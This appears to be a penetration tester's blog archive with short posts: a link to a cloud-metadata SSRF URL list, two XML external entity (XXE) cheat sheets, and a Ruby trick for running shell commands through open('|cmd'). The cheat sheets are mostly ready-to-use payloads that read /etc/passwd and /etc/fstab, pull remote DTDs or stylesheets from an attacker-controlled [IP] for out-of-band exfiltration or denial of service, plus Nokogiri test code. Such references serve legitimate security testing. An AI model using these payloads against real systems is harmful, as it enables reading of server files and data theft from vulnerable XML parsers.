Cheatsheet on Willis Vandevanter

Cloud Metadata URL List

Mon, 28 Mar 2016 00:00:00 +0000

I landed the SSRF Cloud Metadata technique in a few different scenarios recently. If you haven’t seen the talk BHUSA 2014 - Bringing a Machete to the Amazon I recommend it.

To make life a little easier created a living URL list for Metadata broken down by cloud. There are a few more than he discusses in the talk but still has work to go. Submit a PR if you see some missing.

https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb

XML Entity Cheatsheet - Updated

Thu, 24 Dec 2015 00:00:00 +0000

An XML Entity testing cheatsheet. This is an updated version with nokogiri tests removed, just (X)XE notes.

XML Declaration(s):

1
2


<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

1

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

1

<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>

Parameter Entity. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:

1
2
3
4


<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd">%dtd]>

Should be illegal per XML specs but I've seen it work, also useful for DoS:
<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]>

Combined Entity and Parameter Entity:

1

<!DOCTYPE root [<!ENTITY post SYSTEM "http://"><!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]><root>&post;</root>

URL handler. This follows XML Entity - IBM (Broken) I have not used this but Public DTD works just as well:

1

<!DOCTYPE root [<!ENTITY c PUBLIC "-//W3C//TEXT copyright//EN" "http://[IP]/copyright.xml">]>

XML Schema Inline:

1
2


<madeuptag xlmns="http://[ip]" xsi:schemaLocation="http://[IP]">
</madeuptag>

Remote Public DTD, from oxml_xxe payloads:

1

<!DOCTYPE roottag PUBLIC "-//OXML/XXE/EN" "http://[IP]">

External XML Stylesheet, from Burp Suite Release Notes:

1

<?xml-stylesheet type="text/xml" href="http://[IP]"?>

XInclude:

1
2
3


<document xmlns:xi="http://<IP>/XInclude"><footer><xi:include href="title.xml"/></footer></document>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>

Inline XSLT:

1
2
3
4
5
6
7
8


<?xml-stylesheet type="text/xml" href="#mytest"?>
<xsl:stylesheet id="mytest" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format">
<!-- replace with your XSLT attacks -->
<xsl:import href="http://[ip]"/>
<xsl:template match="id('boom')">
 <fo:block font-weight="bold"><xsl:apply-templates/></fo:block>
</xsl:template>
</xsl:stylesheet>

Useful Links:

Simple Ruby Exec with Open and Pipe

Tue, 14 Apr 2015 00:00:00 +0000

I was researching something else and thought this was a cool way to execute a command through the open method in ruby:

1

open("|[CMD]")

The key is starting the open with pipe. For example,

1

open("|ls")

Or to exec and print the result in one line:

1

open("|ls").each {|out| puts out }

Not sure where I saw it originally, but this is an interesting older read: https://devver.wordpress.com/2009/06/30/a-dozen-or-so-ways-to-start-sub-processes-in-ruby-part-1/

XML Entity Cheatsheet

Wed, 03 Sep 2014 00:00:00 +0000

An XML Entity testing cheatsheet. Testing was done using an older vulnerable version of nokogiri. In IRB you can require previous versions of gems. Certain techniques (e.g. XInclude) may require additional settings in Nokogiri.

XML Headers:

1
2


<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

1

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

1
2
3
4


<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>
e.g.
doc = Nokogiri::XML("<!DOCTYPE root [ <!ENTITY spl SYSTEM \"file:///etc/passwd\"> ]>\n<a>&spl;</a>")
doc.children.children.children.text

Parameter Entity Test. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:

1
2
3
4
5


<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]>
e.g.
options = Nokogiri::XML::ParseOptions::DTDATTR
doc = Nokogiri::XML::Document.parse("<!DOCTYPE test [<!ENTITY % dtd SYSTEM \"http://172.16.122.177/student.dtd\"><!ENTITY % a "test %dtd">]>\n<test>success</test>", nil, nil, options)
doc.children.text

Combined Entity and Parameter Entity:

1

<!DOCTYPE root [<!ENTITY post SYSTEM "http://"><!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]><root>&post;</root>

XInclude:

1
2
3


<document xmlns:xi="http://<IP>/XInclude"><footer><xi:include href="title.xml"/></footer></document>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>

URL handler. This follows XML Entity - IBM I have not seen this work “in the wild”. Should be useful for exfiltration testing:

1

<!DOCTYPE root [<!ENTITY c PUBLIC "-//W3C//TEXT copyright//EN" "http://[IP]/copyright.xml">]>

XML Schema Inline:

1
2


<madeuptag xlmns="http://[ip]" xsi:schemaLocation="http://[IP]">
</madeuptag>

Remote XML Schema. Also, have not been able to get this to work:

1

<!DOCTYPE root PUBLIC "abc/Catalog" "http://[IP]/catalog.dtd">

Useful Links: